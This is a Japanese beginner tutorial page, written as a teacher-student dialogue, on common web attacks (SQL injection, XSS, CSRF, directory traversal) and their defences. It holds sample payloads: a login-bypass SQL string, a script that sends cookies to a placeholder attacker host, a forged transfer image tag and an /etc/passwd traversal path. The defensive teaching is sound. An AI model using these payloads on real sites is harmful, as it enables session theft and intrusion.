フリーキーズ | 独学プログラミング
技術コンテンツ転職フリーランスツール用語集ゲームタグ一覧

Webアプリケーションセキュリティ入門!初心者でもわかる攻撃手法と防御戦略の基礎

セキュリティ

最終更新

リンドくん

リンドくん

たなべ先生、ニュースでWebサイトがハッキングされたって話をたまに聞くんですけど...自分もWebアプリを作り始めたので心配です。

たなべ

たなべ

Webアプリを開発する人にとって、セキュリティは絶対に無視できない重要なテーマなんだよ。
今日は初心者でもわかるように、基本的な攻撃手法とその防御方法を一緒に学んでいこう。

Webアプリケーションを開発していると、必ず直面するのがセキュリティの問題です。個人情報の流出や不正アクセスといったニュースは後を絶ちません。
しかし、プログラミングを始めたばかりの方にとって、セキュリティは難しそうで何から学べばいいのかわからない...そんな悩みを抱えている方も多いのではないでしょうか?

Webセキュリティの基本は決して難しいものではありません。
主要な攻撃手法とその対策を理解することが第一歩なのです。

この記事では、Webアプリケーション開発者が必ず知っておくべき代表的な攻撃手法と、それぞれに対する具体的な防御戦略をわかりやすく解説していきます。

プログラミング学習でお悩みの方へ

HackATAは、エンジニアを目指す方のためのプログラミング学習コーチングサービスです。 経験豊富な現役エンジニアがあなたの学習をサポートします。

✓ 質問し放題

✓ β版公開中(2025年内の特別割引)

HackATAの詳細を見る

なぜWebセキュリティが重要なのか

リンドくん

リンドくん

でも先生、個人で作ってる小規模なアプリなら、そこまでセキュリティを気にする必要ないんじゃないですか?

たなべ

たなべ

それが大きな誤解なんだ!
規模に関係なく、すべてのWebアプリがセキュリティリスクにさらされているんだよ。攻撃者は大企業だけでなく、脆弱性のある小規模サイトも狙うからね。

セキュリティを軽視することのリスク

Webアプリケーションのセキュリティを軽視すると、以下のような深刻な問題が発生する可能性があります。

  • 個人情報の流出 - ユーザーの氏名、メールアドレス、パスワードなどが漏洩
  • サービスの停止 - 攻撃によってサーバーがダウンし、サービスが使えなくなる
  • 金銭的損失 - 不正アクセスによる金銭被害や、復旧コストの発生
  • 信頼の失墜 - 一度起きたセキュリティ事故は、ユーザーからの信頼を大きく損なう
  • 法的責任 - 個人情報保護法違反などで法的な責任を問われる可能性

これらの問題は、規模の大小に関わらず発生します。むしろ、セキュリティ対策が不十分な小規模サイトほど攻撃のターゲットになりやすいのです。

開発者の責任とセキュリティ意識

Webアプリケーションを開発する以上、そのアプリを使うユーザーの安全を守る責任が開発者にはあります。「自分はまだ初心者だから...」という言い訳は通用しません。

セキュリティは特別なスキルではなく、すべての開発者が身につけるべき基本的な知識なのです。
幸いなことに、主要な攻撃手法とその対策はパターン化されており、基本を押さえれば多くの脅威から守ることができます。

代表的な攻撃手法とその仕組み

リンドくん

リンドくん

具体的にはどんな攻撃があるんですか?

たなべ

たなべ

代表的なものをいくつか見ていこう。まずはそれぞれの攻撃がどのように動作するのかを理解することが大切だよ。

SQLインジェクション - データベースへの不正アクセス

SQLインジェクションは、最も古典的でありながら、今でも頻繁に見られる攻撃手法です。攻撃者が悪意あるSQL文を入力することで、データベースを不正に操作する攻撃です。

例えば、以下のような脆弱なログイン処理があったとします。

# 脆弱な例(絶対にやってはいけない)
username = request.form['username']
password = request.form['password']

query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
result = database.execute(query)

このコードでは、ユーザー入力をそのままSQL文に埋め込んでいます。攻撃者が以下のような入力をすると、どうなるでしょうか?

ユーザー名: admin' OR '1'='1
パスワード: anything

すると、実行されるSQL文は以下のようになります。

SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='anything'

'1'='1'は常に真なので、パスワードを知らなくてもログインできてしまうのです。これがSQLインジェクションの基本的な仕組みです。

XSS(クロスサイトスクリプティング) - スクリプトの不正実行

XSS(Cross-Site Scripting)は、攻撃者が悪意あるJavaScriptコードをWebページに埋め込む攻撃です。このスクリプトは、そのページを閲覧した他のユーザーのブラウザで実行されます。

例えば、以下のような掲示板アプリがあったとします。

<!-- 脆弱な例 -->
<div class="comment">
    コメント: {{user_comment}}
</div>

攻撃者が以下のようなコメントを投稿すると...

<script>
    // 下記URLは適当な例なので安全です
    document.location='http://____.com/steal?cookie='+document.cookie
</script>

このコメントを見た他のユーザーのブラウザで、上記のスクリプトが実行され、Cookie情報が攻撃者のサーバーに送信されてしまいます。
Cookieにはセッション情報が含まれることが多いため、攻撃者はそのユーザーになりすますことができてしまうのです。

CSRF(クロスサイトリクエストフォージェリ) - 偽造されたリクエスト

CSRFは、ユーザーが意図しない操作を実行させる攻撃です。ユーザーがログイン済みのサイトに対して、攻撃者が用意した罠サイトから不正なリクエストを送信させます。

例えば、銀行サイトで以下のようなURLで送金処理が行われるとします。

https://____.com/transfer?to=攻撃者の口座&amount=100000

攻撃者は以下のような罠サイトを作成します。

<img src="https://____.com/transfer?to=攻撃者の口座&amount=100000" />

ユーザーが銀行サイトにログインした状態でこの罠サイトを訪問すると、画像を読み込もうとして送金リクエストが自動的に送信されてしまいます。

ディレクトリトラバーサル - ファイルへの不正アクセス

ディレクトリトラバーサルは、本来アクセスできないはずのファイルやディレクトリにアクセスする攻撃です。

# 脆弱な例
filename = request.args.get('file')
with open(f'/var/www/documents/{filename}', 'r') as f:
    content = f.read()

攻撃者がfile=../../../etc/passwdのようなパラメータを指定すると、システムの重要なファイルが読み取られてしまう可能性があります。

具体的な防御戦略

リンドくん

リンドくん

怖い攻撃がたくさんありますね...どうやって防げばいいんですか?

たなべ

たなべ

大丈夫!それぞれの攻撃には確立された対策方法があるんだ。基本を押さえれば、多くの攻撃から守ることができるよ。

SQLインジェクション対策 - プリペアドステートメントの活用

SQLインジェクションを防ぐ最も効果的な方法は、プリペアドステートメント(パラメータ化クエリ)を使用することです。

# 安全な実装
username = request.form['username']
password = request.form['password']

# プリペアドステートメントを使用
query = "SELECT * FROM users WHERE username=? AND password=?"
result = database.execute(query, (username, password))

プリペアドステートメントでは、SQL文とデータが明確に分離されます。?の部分にはデータのみが入り、SQL文として解釈されることはありません。
これにより、攻撃者が特殊な文字を入力しても、それはただの文字列として扱われるため、SQLインジェクションを防ぐことができます。

他にも、以下のような対策が有効です。

  • 入力値の検証 - 期待される形式(数値、メールアドレスなど)かどうかをチェック
  • 最小権限の原則 - データベースユーザーに必要最小限の権限のみを付与
  • エラーメッセージの適切な処理 - データベースの詳細情報を表示しない

XSS対策 - 適切なエスケープ処理

XSSを防ぐには、ユーザー入力をそのまま表示せず、必ず適切にエスケープすることが重要です。

# Pythonの例(Flaskフレームワーク)
from markupsafe import escape

@app.route('/comment')
def show_comment():
    user_comment = request.args.get('comment')
    # 自動的にHTMLエスケープされる
    return f"<div>コメント: {escape(user_comment)}</div>"

多くのモダンなフレームワークでは、デフォルトでエスケープ処理が行われます。例えば、Reactでは以下のように書くだけで自動的にエスケープされます。

// Reactの例
function Comment({ userComment }) {
    // 自動的にエスケープされる
    return <div>コメント: {userComment}</div>;
}

エスケープ処理により、<script>などの特殊文字は&lt;script&gt;のように変換され、HTMLとして解釈されなくなります。

その他の対策として以下があります。

  • Content Security Policy(CSP)の設定 - ブラウザに実行可能なスクリプトの範囲を指定
  • HttpOnly属性の設定 - CookieをJavaScriptからアクセスできないようにする
  • 入力値の検証とサニタイゼーション - 期待される形式かどうかをチェックし、不要な文字を削除

CSRF対策 - トークンによる検証

CSRFを防ぐには、CSRFトークンを使用した検証が効果的です。

# Pythonの例(Flaskフレームワーク)
from flask_wtf.csrf import CSRFProtect

app = Flask(__name__)
csrf = CSRFProtect(app)

# フォームにCSRFトークンを含める
<form method="POST">
    <input type="hidden" name="csrf_token" value="{{ csrf_token() }}"/>
    <button type="submit">送信</button>
</form>

CSRFトークンは、正規のフォームからのリクエストであることを確認するための秘密の値です。サーバー側でトークンを生成してフォームに埋め込み、リクエスト時にそのトークンが正しいかを検証します。
攻撃者は正しいトークンを知ることができないため、CSRF攻撃を防ぐことができます。

その他の対策として以下があります。

  • SameSite Cookie属性の設定 - クロスサイトでのCookie送信を制限
  • 重要な操作の再認証 - パスワード変更や送金などの重要な操作では再度パスワード入力を求める
  • Refererヘッダーのチェック - リクエストが正規のサイトから来ているか確認

ディレクトリトラバーサル対策 - 入力の検証とパス正規化

ディレクトリトラバーサルを防ぐには、ユーザー入力から直接ファイルパスを生成しないことが重要です。

# 安全な実装
import os
from pathlib import Path

ALLOWED_DIRECTORY = Path('/var/www/documents')

filename = request.args.get('file')

# ファイル名のみを許可(パス区切り文字を含まない)
if '/' in filename or '\\' in filename or '..' in filename:
    return "不正なファイル名です", 400

# 安全にパスを構築
file_path = ALLOWED_DIRECTORY / filename

# 正規化してディレクトリトラバーサルを防ぐ
file_path = file_path.resolve()

# 許可されたディレクトリ内かチェック
if not str(file_path).startswith(str(ALLOWED_DIRECTORY.resolve())):
    return "アクセスが拒否されました", 403

with open(file_path, 'r') as f:
    content = f.read()

この実装では、以下の対策を行っています。

  • ファイル名に不正な文字(/\..)が含まれていないかチェック
  • パスを正規化(resolve())して..などを解決
  • 最終的なパスが許可されたディレクトリ内にあるか確認

セキュアコーディングの基本原則

リンドくん

リンドくん

いろいろな対策があるんですね。でも、すべてを覚えるのは大変そうです...

たなべ

たなべ

確かに細かい対策は多いけど、基本的な原則を押さえておけば、多くの脆弱性を防げるんだ。その原則を紹介するね。

入力値は常に疑う

すべてのユーザー入力は信頼できないという前提で開発することが重要です。以下のような対策を常に心がけましょう。

  • バリデーション(検証) - 期待される形式かどうかをチェック
  • サニタイゼーション(無害化) - 危険な文字や要素を削除または変換
  • エスケープ処理 - 特殊文字を無害な形式に変換

例えば、メールアドレスの入力欄では以下のようなバリデーションを行います。

import re

def validate_email(email):
    # メールアドレスの形式をチェック
    pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
    if not re.match(pattern, email):
        return False
    
    # 長さのチェック
    if len(email) > 254:
        return False
    
    return True

最小権限の原則

アプリケーションやデータベースユーザーには、必要最小限の権限のみを付与しましょう。

  • データベースユーザーには、必要なテーブルへの必要な操作(SELECT、INSERT等)のみを許可
  • アプリケーションは必要最小限のファイルシステム権限で実行
  • 管理者権限が必要な操作は、通常の操作と明確に分離

多層防御(Defense in Depth)

単一の防御策に頼らず、複数の防御層を組み合わせることが重要です。

例えば、SQLインジェクション対策では以下のような多層防御が考えられます。

  1. 第一層: プリペアドステートメントの使用
  2. 第二層: 入力値のバリデーション
  3. 第三層: データベースユーザーの最小権限設定
  4. 第四層: WAF(Web Application Firewall)の導入

一つの防御が突破されても、他の防御層が攻撃を阻止できる可能性が高まります。

セキュアデフォルト

デフォルトで安全な設定にしておくことも重要です。

  • CookieにはHttpOnlySecure属性をデフォルトで設定
  • フレームワークのセキュリティ機能をデフォルトで有効化
  • エラーメッセージはデフォルトで詳細情報を表示しない

セキュアデフォルトにすることで、設定漏れによる脆弱性を防ぐことができます。

セキュリティチェックリスト

リンドくん

リンドくん

開発するときに、何をチェックすればいいかわかりやすいリストがあると助かります!

たなべ

たなべ

そうだね!実際の開発で使えるチェックリストを用意したよ。これを参考にして、安全なアプリを作っていこう。

開発時のセキュリティチェックリスト

Webアプリケーションを開発する際、以下の項目を確認しましょう。

入力処理

  • すべてのユーザー入力にバリデーションを実施しているか
  • 適切なエスケープ処理を行っているか
  • ファイルアップロード機能では、ファイル種別と容量を制限しているか

認証・認可

  • パスワードは適切にハッシュ化して保存しているか
  • セッション管理は適切に実装されているか
  • CSRF対策としてトークンを使用しているか
  • 重要な操作では再認証を要求しているか

データベース

  • プリペアドステートメントを使用しているか
  • データベースユーザーの権限は最小限に制限されているか
  • エラーメッセージでデータベースの詳細情報を表示していないか

通信

  • HTTPSを使用しているか
  • CookieにSecureHttpOnly属性を設定しているか
  • Content Security Policyを設定しているか

エラー処理

  • 本番環境で詳細なエラーメッセージを表示していないか
  • ログに機密情報を記録していないか

定期的なセキュリティレビュー

開発が完了した後も、定期的にセキュリティをチェックすることが重要です。

  • 依存ライブラリの更新 - 脆弱性が発見されたライブラリを速やかに更新
  • ペネトレーションテスト - 実際の攻撃を模したテストを実施
  • コードレビュー - セキュリティの観点からコードをレビュー
  • セキュリティスキャンツールの活用 - 自動スキャンで既知の脆弱性を検出

まとめ

リンドくん

リンドくん

セキュリティって思ってたより身近で、基本を押さえれば防げるものなんですね!

たなべ

たなべ

その通り!セキュリティは特別なものじゃなく、開発の基本なんだ。今日学んだことを実践して、安全なWebアプリを作っていこう!

この記事では、Webアプリケーションセキュリティの基礎として、代表的な攻撃手法とその防御戦略について解説してきました。

重要なポイントをおさらいしましょう。

  • SQLインジェクション - プリペアドステートメントを使用して、ユーザー入力とSQL文を分離する
  • XSS(クロスサイトスクリプティング) - ユーザー入力を適切にエスケープし、スクリプトの実行を防ぐ
  • CSRF(クロスサイトリクエストフォージェリ) - CSRFトークンを使用して、正規のリクエストであることを検証する
  • ディレクトリトラバーサル - ユーザー入力から直接ファイルパスを生成せず、適切に検証する

そして、セキュアコーディングの基本原則として以下を常に意識しましょう。

  • すべてのユーザー入力は信頼できないものとして扱う
  • 最小権限の原則に従って権限を設定する
  • 多層防御で複数の防御策を組み合わせる
  • デフォルトで安全な設定にする

セキュリティは一度学んで終わりではなく、継続的に学び、実践していくものです。
新しい攻撃手法が日々生まれていますし、使用しているフレームワークやライブラリも更新されていきます。

しかし、基本的な原則とこの記事で紹介した対策を理解しておけば、多くの脅威から自分のアプリケーションを守ることができます。
最初は難しく感じるかもしれませんが、一つ一つ確実に実装していけば、必ず安全なWebアプリケーションを作れるようになります。

Webアプリケーション開発において、セキュリティは後回しにしてはいけません
設計段階から意識し、開発の各段階でセキュリティチェックを行うことが大切です。

安全なWebアプリケーション開発を通じて、ユーザーに信頼されるサービスを作っていきましょう!

この記事をシェア

関連するコンテンツ
セッション管理とクッキー属性を初心者向けに解説!Secure・HttpOnly・SameSiteの基礎

セッション管理とクッキー属性を初心者向けに解説!Secure・HttpOnly・SameSiteの基礎

セキュリティ

2025/12/10

認証の基礎を徹底解説!ログインフローと多要素認証の仕組みを初心者向けに

認証の基礎を徹底解説!ログインフローと多要素認証の仕組みを初心者向けに

セキュリティ

2025/12/09

OWASP Top 10とは?2025年版で学ぶWebセキュリティの基本

OWASP Top 10とは?2025年版で学ぶWebセキュリティの基本

セキュリティ

2025/12/08

SSL/TLSでHTTPS通信を暗号化する仕組みを初心者向けに解説

SSL/TLSでHTTPS通信を暗号化する仕組みを初心者向けに解説

ネットワーク
セキュリティ

2025/12/01

ファイアウォールの基本!パケットフィルタとステートフルの違いを初心者にもわかりやすく解説

ファイアウォールの基本!パケットフィルタとステートフルの違いを初心者にもわかりやすく解説

ネットワーク
セキュリティ

2025/11/28

JWT(JSON Web Token)とは

セキュリティ
認証

2023/09/25